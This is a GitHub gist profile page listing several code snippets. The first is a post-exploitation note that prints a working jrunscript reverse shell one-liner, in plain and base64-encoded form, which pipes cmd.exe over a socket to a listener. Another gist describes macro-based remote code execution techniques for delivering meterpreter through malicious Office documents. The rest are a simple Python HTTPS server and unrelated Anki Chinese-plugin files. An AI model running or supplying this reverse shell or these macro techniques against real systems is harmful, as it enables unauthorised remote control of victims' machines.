Skip to content

Instantly share code, notes, and snippets.

View joeminicucci's full-sized avatar

m1n1 joeminicucci

43 followers · 58 following
View GitHub Profile
@joeminicucci
joeminicucci / JVM_Post_Xploit.md
Created November 5, 2019 17:40

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@joeminicucci
joeminicucci / simple-https-server.py
Created September 16, 2019 18:29 — forked from dergachev/simple-https-server.py
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@joeminicucci
joeminicucci / Various-Macro-Based-RCEs.md
Created September 8, 2019 04:21 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@joeminicucci
joeminicucci / fill_missing.py
Created December 6, 2014 11:47
autofill (chinese support)
# -*- coding: utf-8 -*-
#
# Copyright © 2013 Chris Hatch, <foonugget@gmail.com>
#
# License: GNU GPL, version 3 or later; http://www.gnu.org/copyleft/gpl.html
#
from aqt.utils import showInfo
from anki.find import Finder
from edit_behavior_model import *
@joeminicucci
joeminicucci / dictdb.py
Last active August 29, 2015 14:10
chinese plugin mods
# -*- coding: utf-8 -*-
#
# Copyright © 2014 Thomas TEMPÉ, <thomas.tempe@alysse.org>
#
# License: GNU GPL, version 3 or later; http://www.gnu.org/copyleft/gpl.html
#
#COPYRIGHT AND PERMISSION NOTICE
#Copyright © 1991-2012 Unicode, Inc. All rights reserved. Distributed under the Terms of Use in http://www.unicode.org/copyright.html.